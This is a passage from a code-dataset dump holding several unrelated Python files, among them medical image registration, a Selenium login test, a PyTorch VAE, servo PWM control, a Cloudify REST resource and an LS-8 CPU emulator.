matched\n M_field = nibabel.load(reg_dict['fwdtransforms'][0])\n iM_field = nibabel.load(reg_dict['invtransforms'][-1])\n \n Mt = M_field.get_fdata()\n iMt = iM_field.get_fdata()\n \n #Mt = -M_field.get_fdata()\n #iMt = -iM_field.get_fdata()\n #Mt[...,:2] = 
-Mt[...,:2]\n #iMt[...,:2] = -iMt[...,:2]\n \n Mt = np.squeeze(Mt)\n iMt = np.squeeze(iMt)\n #Mt = M_scale(Mt,If.shape,1/reg_level[-1])\n #iMt = M_scale(iMt,If.shape,1/reg_level[-1])\n fileList = glob.glob(tmp_dir + '*')\n # Iterate over the list of filepaths & remove each file.\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n continue\n \n return Mt, iMt\n\n## get Jacobian, Specific Ventilation\ndef ANTsJac(If,Im,vox_res = [1,1,1], reg_level = [8,4,2], gauss_filt = [2,2,1]):\n # to antsimage\n fixed = ants.from_numpy(Im)\n moving = ants.from_numpy(If)\n \n tmp_dir = 'tmp{}_'.format(np.random.randint(0,1e4))\n # SyN registration\n reg_dict = ants.registration(fixed, moving, type_of_transform='SyNOnly', \\\n syn_metric='demons', syn_sampling=4, \\\n grad_step=0.1, flow_sigma=5, total_sigma=3,\\\n reg_iterations=(100,100,40,20,10), \\\n verbose=False, outprefix=tmp_dir, \\\n w='[0.1,1]')\n \n # Jacobian \n jac_ants = ants.create_jacobian_determinant_image(fixed,reg_dict['invtransforms'][-1])\n jac = jac_ants.numpy()\n \n # calculate specific ventilation \n reg_ants = reg_dict['warpedfixout']\n reg = reg_ants.numpy()\n \n reg = ndimage.filters.gaussian_filter(reg, (3,3,3), mode='reflect', truncate=1)\n If = ndimage.filters.gaussian_filter(If, (3,3,3), mode='reflect', truncate=1)\n \n sv = (If - reg) / (reg + np.finfo(float).eps)\n \n\n # Get a list of all the file paths that ends with .txt from in specified directory\n fileList = glob.glob(tmp_dir + '*')\n # Iterate over the list of filepaths & remove each file.\n for filePath in fileList:\n try:\n os.remove(filePath)\n except:\n continue\n\n return jac, sv\n\n## Demons registration\ndef imgrad3d(I):\n gx = I-sp.circshift(I,(-1,),axes=(0,))\n gx[-1,:,:]=0 \n gy = I-sp.circshift(I,(-1,),axes=(1,))\n gy[:,-1,:]=0 \n gz = I-sp.circshift(I,(-1,),axes=(2,))\n gz[:,:,-1]=0 \n \n return gx,gy,gz\n\ndef lap3d(I):\n gxx = sp.circshift(I,(-1,),axes=(0,)) + sp.circshift(I,(1,),axes=(0,)) - 2*I\n gyy = sp.circshift(I,(-1,),axes=(1,)) + sp.circshift(I,(1,),axes=(1,)) - 2*I\n gzz = sp.circshift(I,(-1,),axes=(2,)) + sp.circshift(I,(1,),axes=(2,)) - 2*I\n lapI = gxx + gyy + gzz\n return lapI\n\ndef pmask(I,sigma):\n # TODO: optimize\n I = np.abs(I)\n mask = np.abs(I)>sigma\n mask = ndimage.morphology.binary_fill_holes(mask)\n mask = ndimage.morphology.binary_opening(mask,structure=np.ones((5,5,5)))\n return mask\n\ndef DemonsReg4(Is,ref = 0, level = 3, device = -1):\n M_fields = []\n iM_fields = []\n nphase = len(Is)\n print('4D Demons registration:')\n for i in range(nphase):\n print('Ref/Mov:{}/{}'.format(i,ref))\n M_field = Demons(np.abs(Is[ref]), np.abs(Is[i]), level = level, device = device)\n M_fields.append(M_field)\n \n return np.asarray(M_fields)\n\ndef Demons(If, Im, level, device = -1, rho = 0.7,\n sigmas_f = [2,2,2,3],sigmas_e = [2,2,2,2],sigmas_s = [.5,.5,1,1],iters = [40,40,40,20,20]):\n ### normalization??\n Im = np.abs(Im)\n m_scale = np.max(Im)\n Im = Im/m_scale\n If = np.abs(If)\n If = If/m_scale\n \n ### registration\n M = np.zeros(Im.shape+(3,))\n Mt = np.zeros(Im.shape+(3,))\n for k in range(level):\n print('Demons Level:{}'.format(k))\n ### hyperparameter assignment\n scale = 2**(level-k-1)\n sigma_f = sigmas_f[k]\n sigma_e = sigmas_e[k]\n sigma_s = sigmas_s[k]\n iter_each_level = iters[k]\n\n ###\n Ift = ndimage.zoom(If,zoom=1/scale,order=2)\n Ift = ndimage.gaussian_filter(Ift,sigma=sigma_s,truncate=2.0)\n Imt = ndimage.zoom(Im,zoom=1/scale,order=2)\n Imt = ndimage.gaussian_filter(Imt,sigma=sigma_s,truncate=2.0)\n 
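Editor's note: the registration record's `imgrad3d` leans on `sigpy.circshift`; assuming its shift convention matches `np.roll` (which the usage above suggests), the same forward differences, with the trailing slice zeroed, can be tested without sigpy:

```python
import numpy as np

def imgrad3d_np(I):
    gx = I - np.roll(I, -1, axis=0); gx[-1, :, :] = 0
    gy = I - np.roll(I, -1, axis=1); gy[:, -1, :] = 0
    gz = I - np.roll(I, -1, axis=2); gz[:, :, -1] = 0
    return gx, gy, gz

gx, gy, gz = imgrad3d_np(np.arange(27.0).reshape(3, 3, 3))
```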
Imask = pmask(Imt+Ift,1e-2)\n\n Isizet = Ift.shape \n Mt = M_scale(Mt,Isizet)\n uo = np.zeros_like(Mt)\n for i in range(iter_each_level):\n\n Imm = interp(Imt, Mt ,device = sp.Device(device),k_id = 1)\n Ifm = interp(Ift, -Mt ,device = sp.Device(device),k_id = 1)\n dI = Ifm-Imm\n Is = (Ifm+Imm)/2\n # Is = ndimage.gaussian_filter((Ifm+Imm)/2,sigma=sigma_s,truncate=2.0)\n\n gIx,gIy,gIz = imgrad3d(Is)\n gI = np.sqrt(np.abs(gIx**2+gIy**2+gIz**2)+1e-6)\n discriminator = gI**2 + np.abs(dI)**2\n dI = dI * 3.0\n ux = -dI*gIx/discriminator\n uy = -dI*gIy/discriminator\n uz = -dI*gIz/discriminator\n\n mask = (gI<1e-4)|(~Imask)\n ux[np.isnan(ux)|mask]=0\n uy[np.isnan(uy)|mask]=0\n uz[np.isnan(uz)|mask]=0\n\n ux = np.maximum(np.minimum(ux,1),-1)\n uy = np.maximum(np.minimum(uy,1),-1)\n uz = np.maximum(np.minimum(uz,1),-1)\n ux = ndimage.gaussian_filter(ux,sigma=sigma_f)\n uy = ndimage.gaussian_filter(uy,sigma=sigma_f)\n uz = ndimage.gaussian_filter(uz,sigma=sigma_f)\n\n\n Mt[...,0] = Mt[...,0] + rho * ux + (1-rho)*uo[...,0]\n Mt[...,1] = Mt[...,1] + rho * uy + (1-rho)*uo[...,1]\n Mt[...,2] = Mt[...,2] + rho * uz + (1-rho)*uo[...,2]\n uo[...,0] = ux\n uo[...,1] = uy\n uo[...,2] = uz\n\n Mt[...,0] = ndimage.gaussian_filter(Mt[...,0],sigma=sigma_e)\n Mt[...,1] = ndimage.gaussian_filter(Mt[...,1],sigma=sigma_e)\n Mt[...,2] = ndimage.gaussian_filter(Mt[...,2],sigma=sigma_e)\n \n ### TODO inverse combination (right now just double)\n M = M_scale(Mt*2,Im.shape) \n return M\n\n\n\n## interpolation operator\nclass interp_op(Linop):\n def __init__(self, ishape, M_field, iM_field = None):\n ndim = M_field.shape[-1]\n assert list(ishape) == list(M_field.shape[:-1]),\"Dimension mismatch!\"\n oshape = ishape\n self.M_field = M_field\n self.iM_field = iM_field\n super().__init__(oshape, ishape)\n\n def _apply(self, input):\n device = backend.get_device(input)\n\n with device:\n return interp(input, self.M_field, device, 1) # major change\n\n def _adjoint_linop(self):\n device = backend.get_device(input)\n if self.iM_field is None:\n iM_field = -self.M_field\n M_field = None\n else:\n iM_field = self.iM_field\n M_field = self.M_field\n\n return interp_op(self.ishape, iM_field, M_field)\n \ndef interp(I, M_field, device = sp.Device(-1), k_id = 1, deblur = True):\n # b spline interpolation\n N = 64\n if k_id is 0:\n kernel = [(3*(x/N)**3-6*(x/N)**2+4)/6 for x in range(0,N)]+[(2-x/N)**3/6 for x in range(N,2*N)]\n dkernel = np.array([-.2,1.4,-.2])\n \n k_wid = 4\n else:\n kernel = [1-x/(2*N) for x in range(0,2*N)]\n dkernel = np.array([0,1,0])\n deblur = False\n k_wid = 2\n kernel = np.asarray(kernel)\n \n c_device = sp.get_device(I)\n ndim = M_field.shape[-1]\n \n # 2d/3d\n if ndim is 3:\n dkernel = dkernel[:,None,None]*dkernel[None,:,None]*dkernel[None,None,:]\n Nx,Ny,Nz = I.shape\n my,mx,mz = np.meshgrid(np.arange(Ny),np.arange(Nx),np.arange(Nz))\n m = np.stack((mx,my,mz),axis=-1)\n M_field = M_field + m\n else:\n dkernel = dkernel[:,None]*dkernel[None,:]\n Nx,Ny = I.shape\n my,mx = np.meshgrid(np.arange(Ny),np.arange(Nx))\n m = np.stack((mx,my,mz),axis=-1)\n M_field = M_field + m\n # TODO remove out of range values\n \n # image warp\n \n g_device = device\n I = sp.to_device(input=I,device=g_device)\n from importlib_metadata import version\n if version('sigpy') <= '0.1.16':\n I = sp.interp.interpolate(I,k_wid,kernel,M_field.astype(np.float64)) # v0.1.16 (input, width, kernel, coord)\n else: \n M_field_device = sp.to_device(input=M_field.astype(np.float64), device=g_device) # v0.1.17\n I = 
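Editor's note: three pitfalls in `interp` below/above this boundary: `k_id is 0` compares identity and only works because CPython caches small ints (use `==`); the 2-D branch stacks `mz`, which is undefined there; and `version('sigpy') <= '0.1.16'` compares version strings lexicographically, so `'0.1.9'` counts as newer than `'0.1.16'` even though it is an older release. A safer version gate (assumes the `packaging` library is available):

```python
from importlib_metadata import version
from packaging.version import Version

use_legacy_interpolate = Version(version('sigpy')) <= Version('0.1.16')
```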
sp.interp.interpolate(input=I,coord=M_field_device) # v0.1.17 (input, coord, kernel='spline', width=2, param=1)\n # deconv\n if deblur is True:\n sp.conv.convolve(I,dkernel)\n I = sp.to_device(input=I,device=c_device)\n \n return I\n","sub_path":"imoco_py/sigpy_e/reg.py","file_name":"reg.py","file_ext":"py","file_size_in_byte":12699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"295551270","text":"#coding:utf-8\nfrom selenium import webdriver\nimport unittest\nfrom pages.login_page import LoginPage,login_url\nimport time\n\n'''\n1,输入用户名,输入密码,点击登录\n2,输入用户名,不输入密码,点击登录\n3,输入错误的用户名,密码,点击登录\n4,点击忘记密码\n'''\n\nclass LoginPageCase(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Firefox()\n cls.loginp = LoginPage(cls.driver)\n\n def setUp(self):\n self.driver.get(login_url)\n self.loginp.is_exist_alert()\n self.driver.delete_all_cookies()\n self.driver.refresh()\n\n def test_01(self):\n '''输入用户名,输入密码,点击登录'''\n self.loginp.input_user(\"zhouyanping\")\n self.loginp.input_pwd(\"zhouyanping\")\n self.loginp.click_login_button()\n gu = self.loginp.get_login_info()\n assert gu == \"周艳萍\"\n\n def test_02(self):\n '''输入用户名,不输入密码,点击登录'''\n self.loginp.input_user(\"zhouyanping\")\n self.loginp.click_login_button()\n gu = self.loginp.get_login_info()\n assert gu == \"\"\n\n def test_03(self):\n '''输入错误的用户名,密码,点击登录'''\n self.loginp.input_user(\"zhouyanping\")\n self.loginp.input_pwd(\"123456\")\n self.loginp.click_login_button()\n gu = self.loginp.get_login_info()\n assert gu == \"\"\n\n def test_04(self):\n '''点击忘记密码'''\n self.loginp.click_forget_pwd()\n gu = self.loginp.get_element()\n assert gu == \"刷新\"\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n\n\n\n\n\n","sub_path":"case/test_login_case.py","file_name":"test_login_case.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"227957817","text":"import torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport numpy as np\nimport torch.nn.functional as F\nclass Encode(nn.Module):\n\n def __init__(self,x_dim,z_dim,hidden_dim,vocab_size,dropout,bsz,device_id):\n super(Encode, self).__init__()\n self.x_dim = x_dim\n self.z_dim = z_dim\n self.hidden_dim = hidden_dim\n self.bsz = bsz\n self.device_id = device_id\n self.lstm = nn.LSTM(x_dim, hidden_dim,dropout=dropout)\n self.fc21 = nn.Linear(hidden_dim, z_dim) #mean\n self.drop = nn.Dropout(dropout)\n self.fc5 = nn.Linear(z_dim,hidden_dim)\n self.init_weights()\n def init_weights(self):\n initrange = 0.1\n self.fc21.bias.data.fill_(0)\n self.fc21.weight.data.uniform_(-initrange, initrange)\n self.fc5.bias.data.fill_(0)\n self.fc5.weight.data.uniform_(-initrange, initrange)\n def noise(self):\n xi = Variable(torch.randn(self.bsz,self.z_dim).cuda(self.device_id))\n return xi\n\n def forward(self, x):\n c0 = Variable(torch.zeros((1,self.bsz,self.hidden_dim)).cuda(self.device_id))\n xi = self.noise()\n h0 = self.fc5(xi)\n h0 = h0.unsqueeze(0)\n s0 = (h0,c0)\n lstm_out, _ = self.lstm(x,s0)\n lstm_out = lstm_out[-1,:,:]\n lstm_out = self.drop(lstm_out)\n z = self.fc21(lstm_out)\n return z\n\nclass Decode(nn.Module):\n\n def __init__(self, x_dim,z_dim,hidden_dim,vocab_size,dropout,bsz,device_id):\n super(Decode, self).__init__()\n self.z_dim = z_dim\n self.hidden_dim = hidden_dim\n self.fc5 = nn.Linear(z_dim,hidden_dim)\n self.lstm = 
nn.LSTM(x_dim, hidden_dim,dropout=dropout)\n self.fc4 = nn.Linear(hidden_dim,vocab_size)\n self.drop = nn.Dropout(dropout)\n self.bsz = bsz\n self.device_id = device_id\n self.init_weights()\n def init_weights(self):\n initrange = 0.1\n self.fc5.bias.data.fill_(0)\n self.fc5.weight.data.uniform_(-initrange, initrange)\n self.fc4.bias.data.fill_(0)\n self.fc4.weight.data.uniform_(-initrange, initrange)\n\n def forward(self,x_emb, z):\n c0 = Variable(torch.zeros((1,self.bsz,self.hidden_dim)).cuda(self.device_id))\n h0 = self.fc5(z)\n h0 = h0.unsqueeze(0)\n s0 = (h0,c0)\n ht,st = self.lstm(x_emb,s0)\n ht = self.drop(ht)\n recon_batch = self.fc4(ht)\n return recon_batch\nclass Label(nn.Module):\n\n def __init__(self,x_dim,z_dim,hidden_dim,vocab_size,dropout,bsz,device_id):\n super(Label, self).__init__()\n self.x_dim = x_dim\n self.hidden_dim = hidden_dim\n self.fc5 = nn.Linear(z_dim,hidden_dim)\n self.lstm = nn.LSTM(x_dim, hidden_dim,dropout=dropout)\n self.fc1 = nn.Linear(hidden_dim, 2)\n self.drop = nn.Dropout(dropout)\n self.device_id = device_id\n self.bsz = bsz\n self.init_weights()\n def init_weights(self):\n initrange = 0.1\n self.fc5.bias.data.fill_(0)\n self.fc5.weight.data.uniform_(-initrange, initrange)\n self.fc1.bias.data.fill_(0)\n self.fc1.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, x,z):\n c0 = Variable(torch.zeros((1,self.bsz,self.hidden_dim)).cuda(self.device_id))\n h0 = self.fc5(z)\n h0 = h0.unsqueeze(0)\n s0 = (h0,c0)\n lstm_out, _ = self.lstm(x,s0)\n lstm_out = lstm_out[-1,:,:]\n lstm_out = self.drop(lstm_out)\n recon_label = self.fc1(lstm_out)\n probs = F.softmax(recon_label,dim = 1)\n\n return probs\nclass VAE(nn.Module):\n \"\"\"Container module with an encoder, a recurrent module, and a decoder.\"\"\"\n\n def __init__(self, rnn_type, ntoken, ninp, nhid, z_dim,nlayers, device_id, bsz,dropout=0.5, tie_weights=False):\n super(VAE, self).__init__()\n self.drop = nn.Dropout(dropout)\n self.word_embeddings = nn.Embedding(ntoken, ninp)\n self.encoder = Encode(ninp,z_dim,nhid,ntoken,dropout,bsz,device_id)\n self.decoder = Decode(ninp,z_dim,nhid,ntoken,dropout,bsz,device_id)\n self.label = Label(ninp,z_dim,nhid,ntoken,dropout,bsz,device_id)\n self.rnn_type = rnn_type\n self.nhid = nhid\n self.nlayers = nlayers\n self.device_id = device_id\n self.bsz = bsz\n self.embed = nn.Sequential(\n self.word_embeddings,\n self.drop)\n self.init_weights()\n def init_weights(self):\n initrange = 0.1\n self.word_embeddings.weight.data.uniform_(-initrange, initrange)\n\n def forward(self, input):\n emb = self.embed(input)\n z = self.encoder(emb)\n fake_label = self.label(emb,z)\n recon_batch = self.decoder(emb,z)\n return recon_batch,z,fake_label\n\n def noise_loss(self,lr,alpha):\n noise_loss = 0.0\n noise_std = np.sqrt(2/lr*alpha)\n for var in self.parameters():\n means = torch.zeros(var.size()).cuda(self.device_id)\n noise = Variable(torch.normal(means, std = noise_std).cuda(self.device_id),requires_grad = False)\n noise_loss += torch.sum(var * noise)\n return noise_loss\n ","sub_path":"semi_text/model_bae.py","file_name":"model_bae.py","file_ext":"py","file_size_in_byte":5175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"224742981","text":"import asyncio\nfrom aiohttp import web\nfrom .config import repos\n\n\n@asyncio.coroutine\ndef handle(request):\n path = request.match_info['path']\n repo = path.lstrip('/').partition('/')[0]\n if repo not in repos.keys():\n raise web.HTTPNotFound\n return 
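Editor's note: `noise_loss` in the VAE record above uses the legacy `Variable`/`.cuda(device_id)` idioms. A modern sketch of the same SGLD-style noise term, with the identical standard deviation (`np.sqrt(2/lr*alpha)` is `sqrt(2*alpha/lr)` by precedence):

```python
import torch

def noise_loss(model, lr, alpha):
    std = (2.0 * alpha / lr) ** 0.5
    total = 0.0
    for p in model.parameters():
        noise = torch.randn_like(p) * std    # lands on p's own device
        total = total + (p * noise).sum()
    return total
```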
web.Response()\n\napp = web.Application()\napp.router.add_route('GET', '/{path:.*}', handle)\n\nif __name__ == '__main__':\n web.run_app(app)\n\n# vim: set expandtab ts=4 sw=4:\n","sub_path":"repo-proxy/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"436931409","text":"import time\nimport pigpio\n# By default it uses GPIO.BCM pin numbering.\n\n# FIRST RUN sudo pigpiod in terminal\n\nclass PWM:\n\tdef __init__(self, pin, min_val=750, max_val=2300): # vals in us\n\t\tself.pin = pin\n\t\tself.pi = pigpio.pi()\n\t\tself.pi.set_mode(self.pin, pigpio.OUTPUT)\n\t\tself.min= min_val\n\t\tself.max = max_val\n\n\tdef set_angle(self, angle):\n\t\tdeg = float(self.max-self.min)/180\n\t\tduty_cycle = self.min + deg*angle\n\t\tself.pi.set_servo_pulsewidth(self.pin, duty_cycle)\n\n\tdef set_duty_cycle(self, dc): # duty cycle in us\n\t\tself.pi.set_servo_pulsewidth(self.pin, dc)\n\n\tdef stop(self):\n\t\tself.pi.set_servo_pulsewidth(self.pin, 0)\n\t\tself.pi.stop()\n\n\tdef example_servo(self):\n\t\tself.pi.set_servo_pulsewidth(self.pin, self.min) # safe anti-clockwise\n\t\ttime.sleep(5)\n\t\t# self.pi.set_servo_pulsewidth(self.pin, (self.max+self.min)/2) # centre\n\t\t# time.sleep(2)\n\t\tself.pi.set_servo_pulsewidth(self.pin, self.max) # safe clockwise\n\t\ttime.sleep(2)\n\t\tself.stop()\n\n\tdef example_throttle(self):\n\t\tself.pi.set_servo_pulsewidth(self.pin, 1200)\n\t\ttime.sleep(2)\n\t\tself.pi.set_servo_pulsewidth(self.pin, 0)\n\t\t# self.stop()\n\nif __name__ == '__main__':\n\tpin = 17\n\tservo = PWM(pin)\n\t# servo.set_duty_cycle(1000)\n\t# servo.example_throttle()\n\t# servo.example_servo()\n\n\tservo.set_angle(180)\n\ttime.sleep(2)\n\tservo.stop()","sub_path":"src/propelled_cow/src/propelled_cow/pwm_pigpio.py","file_name":"pwm_pigpio.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"571950511","text":"class Solution:\n def rotate(self, matrix):\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n if not matrix or len(matrix) == 1:\n return\n\n initial_len = len(matrix)\n added = 0\n for col in range(len(matrix)):\n print(\"matrix so far\", matrix)\n rotated = [matrix[idx][col] for idx in range(len(matrix) - 1, added-1, -1)]\n matrix.insert(col, rotated)\n added += 1\n print(\"matrix\", matrix)\n\n while initial_len:\n matrix.pop()\n initial_len -= 1\n\n\n return matrix\n\n\ntest_case = [[1,2,3],[4,5,6],[7,8,9]]\nexp_result = [[7,4,1],[8,5,2],[9,6,3]]\nres = Solution().rotate(test_case)\n\n","sub_path":"tinker/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"361974152","text":"from sklearn.datasets import load_breast_cancer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nimport matplotlib.pyplot as plt\n\nbreast_cancer_data = load_breast_cancer()\n\n#splitting breast_cancer_data in training and validation sets\ntraining_data, validation_data, training_labels, validation_labels = train_test_split(breast_cancer_data.data, breast_cancer_data.target, test_size = 0.2, random_state = 100)\n\nk_list = range(1,101)\nk_accuracies = []\nfor k in range(1,101):\n classifier = KNeighborsClassifier(k)\n classifier.fit(training_data, training_labels) #fitting data to 
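Editor's note: the `repo-proxy` handler just above uses the generator-based `@asyncio.coroutine` decorator, which was removed in Python 3.11. The `async def` form, assuming the same `repos` mapping from `.config`:

```python
from aiohttp import web
from .config import repos

async def handle(request):
    path = request.match_info['path']
    repo = path.lstrip('/').partition('/')[0]
    if repo not in repos:            # .keys() is redundant for membership tests
        raise web.HTTPNotFound()
    return web.Response()
```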
classifier to generate trends\n score = classifier.score(validation_data, validation_labels) #generating validation score for each K-value\n k_accuracies.append(score)\n \n#plotting K-Neighbors and correlating validation score\nplt.plot(k_list, k_accuracies)\nplt.xlabel(\"k values\")\nplt.ylabel(\"k accuracies\")\nplt.show()\n","sub_path":"BreastCancerClassifer.py","file_name":"BreastCancerClassifer.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"471489626","text":"#########\n# Copyright (c) 2015 GigaSpaces Technologies Ltd. All rights reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# * See the License for the specific language governing permissions and\n# * limitations under the License.\n\nfrom flask import request\nfrom flask_restful_swagger import swagger\n\nfrom manager_rest.deployment_update.constants import PHASES\nfrom manager_rest import manager_exceptions\nfrom manager_rest.storage import models\nfrom manager_rest.security import SecuredResource\nfrom manager_rest.security.authorization import authorize\nfrom manager_rest.utils import create_filter_params_list_description\nfrom manager_rest.upload_manager import \\\n UploadedBlueprintsDeploymentUpdateManager\nfrom manager_rest.deployment_update.manager import \\\n get_deployment_updates_manager\n\nfrom .. import rest_decorators\nfrom ..rest_utils import verify_and_convert_bool\n\n\nclass DeploymentUpdate(SecuredResource):\n @rest_decorators.exceptions_handled\n @authorize('deployment_update_create')\n @rest_decorators.marshal_with(models.DeploymentUpdate)\n def post(self, id, phase):\n \"\"\"\n Provides support for two phases of deployment update. The phase is\n chosen according to the phase arg, and the id is used by this step.\n\n In the first phase the deployment update is\n 1. Staged (from a new blueprint)\n 2. The steps are extracted and saved onto the data model.\n 3. The data storage is manipulated according to the\n addition/modification steps.\n 4. 
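Editor's note: the k-sweep in the classifier record above stops at plotting; picking the best k is a one-line reduction over the collected scores. A standalone distillation:

```python
from sklearn.datasets import load_breast_cancer
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier

X, y = load_breast_cancer(return_X_y=True)
X_tr, X_va, y_tr, y_va = train_test_split(X, y, test_size=0.2, random_state=100)
scores = {k: KNeighborsClassifier(n_neighbors=k).fit(X_tr, y_tr).score(X_va, y_va)
          for k in range(1, 101)}
best_k = max(scores, key=scores.get)
print(best_k, scores[best_k])
```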
The update workflow is run, executing any lifecycles of add/removed\n nodes or relationships.\n\n The second step finalizes the commit by manipulating the data model\n according to any removal steps.\n\n In order\n :param id: for the initiate step it's the deployment_id, and for the\n finalize step it's the update_id\n :param phase: initiate or finalize\n :return: update response\n \"\"\"\n if phase == PHASES.INITIAL:\n return self._commit(id)\n elif phase == PHASES.FINAL:\n return get_deployment_updates_manager().finalize_commit(id)\n\n @staticmethod\n def _commit(deployment_id):\n manager = get_deployment_updates_manager()\n request_json = request.args\n skip_install = verify_and_convert_bool(\n 'skip_install',\n request_json.get('skip_install', 'false'))\n skip_uninstall = verify_and_convert_bool(\n 'skip_uninstall',\n request_json.get('skip_uninstall', 'false'))\n force = verify_and_convert_bool(\n 'force',\n request_json.get('force', 'false'))\n workflow_id = request_json.get('workflow_id', None)\n\n if (skip_install or skip_uninstall) and workflow_id:\n raise manager_exceptions.BadParametersError(\n 'skip_install has been set to {0}, skip uninstall has been'\n ' set to {1}, and a custom workflow {2} has been set to '\n 'replace \"update\". However, skip_install and '\n 'skip_uninstall are mutually exclusive with a custom '\n 'workflow'.format(skip_install,\n skip_uninstall,\n workflow_id))\n\n manager.validate_no_active_updates_per_deployment(\n deployment_id=deployment_id, force=force)\n\n deployment_update, _ = \\\n UploadedBlueprintsDeploymentUpdateManager(). \\\n receive_uploaded_data(deployment_id)\n\n manager.extract_steps_from_deployment_update(deployment_update)\n\n return manager.commit_deployment_update(\n deployment_update,\n skip_install=skip_install,\n skip_uninstall=skip_uninstall,\n workflow_id=workflow_id)\n\n\nclass DeploymentUpdateId(SecuredResource):\n @swagger.operation(\n responseClass=models.DeploymentUpdate,\n nickname=\"DeploymentUpdate\",\n notes='Return a single deployment update',\n parameters=create_filter_params_list_description(\n models.DeploymentUpdate.response_fields, 'deployment update'\n )\n )\n @rest_decorators.exceptions_handled\n @authorize('deployment_update_get')\n @rest_decorators.marshal_with(models.DeploymentUpdate)\n def get(self, update_id):\n return \\\n get_deployment_updates_manager().get_deployment_update(update_id)\n\n\nclass DeploymentUpdates(SecuredResource):\n @swagger.operation(\n responseClass='List[{0}]'.format(\n models.DeploymentUpdate.__name__),\n nickname=\"listDeploymentUpdates\",\n notes='Returns a list of deployment updates',\n parameters=create_filter_params_list_description(\n models.DeploymentUpdate.response_fields,\n 'deployment updates'\n )\n )\n @rest_decorators.exceptions_handled\n @authorize('deployment_update_list')\n @rest_decorators.marshal_with(models.DeploymentUpdate)\n @rest_decorators.create_filters(models.DeploymentUpdate)\n @rest_decorators.paginate\n @rest_decorators.sortable(models.DeploymentUpdate)\n def get(self, _include=None, filters=None, pagination=None,\n sort=None, **kwargs):\n \"\"\"\n List deployment modification stages\n \"\"\"\n deployment_updates = \\\n get_deployment_updates_manager().list_deployment_updates(\n include=_include, filters=filters, pagination=pagination,\n sort=sort, **kwargs)\n return 
deployment_updates\n","sub_path":"rest-service/manager_rest/rest/resources_v2_1/deployment_update.py","file_name":"deployment_update.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"542845684","text":"CALL = 0b01010000\nHLT = 0b00000001 \nINT = 0b01010010\nIRET = 0b00010011\nJEQ = 0b01010101\nJGE = 0b01011010\nJGT = 0b01010111\nJLE = 0b01011001\nJLT = 0b01011000\nJMP = 0b01010100\nJNE = 0b01010110\nLD = 0b10000011\nLDI = 0b10000010\nPOP = 0b01000110\nNOP = 0b00000000\nPRA = 0b01001000\nPRN = 0b01000111\nPUSH = 0b01000101\nRET = 0b00010001\nST = 0b10000100\n\n\ndef handle_CALL(self, operand_a, operand_b):\n # Get the current address\n addr = self.reg[operand_a]\n # Advance the return address\n rtn_addr = self.pc + 2\n # Subtract one ('after' the instruction) from SP\n self.reg[7] -= 1 \n sp = self.reg[7]\n # Push the address of the instruction after CALL to the stack\n self.ram[sp] = rtn_addr \n # Set the PC to the address in the given register\n self.pc = addr\n\ndef handle_HLT(self, *args):\n # Stop all processes\n self.is_running = False\n\ndef handle_LDI(self, operand_a, operand_b):\n # Set the value of the register at op_a to op_b\n self.reg[operand_a] = operand_b\n\ndef handle_PRN(self, operand_a, operand_b):\n # print the value of the register at op_a\n print(self.reg[operand_a])\n\ndef handle_PUSH(self, operand, *args):\n val = self.reg[operand]\n # decrement the SP\n self.reg[7] -= 1\n # Put the value into the stack at the address indicated by the SP\n self.ram[self.reg[7]] = val\n\ndef handle_POP(self, operand, *args):\n # Put the value at the top of the stack into the given register\n val = self.ram[self.reg[7]]\n self.reg[operand] = val\n # Increment the stack point\n self.reg[7] += 1\n\ndef handle_RET(self, *args):\n # Subroutine complete, return\n rtn_addr = self.ram[self.reg[7]]\n # Increment by one because the value has been handled\n self.reg[7] += 1\n # value from the top of the stack gets stored to PC\n self.pc = rtn_addr\n\ndef handle_INT(self, operand, *args):\n # set r6's nth bit to the value in the given reg\n # use hashing w/ or to preserve all other digits\n # hashing number will be a 1 squished over by the amount of the value\n self.reg[6] |= (1 << self.reg[operand])\n\ndef handle_IRET(self, *args):\n # pop r6-r0 off the stack in that order\n for i in range(6, -1, -1):\n self.handle_POP(i)\n # pop the FL reg off the stack\n self.FL = self.ram_read(self.reg[7])\n self.reg[7] += 1\n # pop the return address off and store it in pc\n self.pc = self.reg[7]\n #TODO re-enable interupts (?)\n\ndef handle_JEQ(self, operand, *args):\n # Check if the flag has a 1 in the E (last position)\n # Hash with & b/c we only care about the last digit\n # If the last digit is true, this will return true\n if self.FL & 0b00000001:\n self.pc = self.reg[operand]\n else:\n self.pc += 2\n\ndef handle_JGE(self, operand, *args):\n # If the last or second last position is true, this will return true\n if self.FL & 0b00000011:\n self.pc = self.reg[operand]\n # PC incrementer in run is set to ignore these 